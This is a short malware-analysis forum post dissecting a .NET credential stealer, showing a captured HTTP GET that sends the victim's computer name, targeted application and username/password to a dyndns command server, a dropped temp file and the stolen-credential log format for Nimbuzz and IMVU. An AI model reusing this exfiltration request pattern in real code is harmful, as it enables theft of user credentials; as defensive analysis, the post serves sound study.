A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #5567  by Xylitol
 Sun Mar 20, 2011 4:51 pm
Code: Select all
Host: winupdate.dyndns-wiki.com
GET /api.php?key=ACAB&computer=XYLITOL-28E1A19&tool=IMVU&page=&user=&pass= HTTP/1.1
Connection: Keep-Alive

HTTP/1.1 200 OK
Microsoft Visual C# / Basic .NET [Overlay]
Image
dropped file in %temp%: "XYLITOL-28E1A19" (computer name)
Code: Select all













Application: Nimbuzz
Username: 
Passwort: 

Application: IMVU
Username : 
Password : 




infos seem sent via url for avoid ftp/smtp connection and transmit in clear user/password.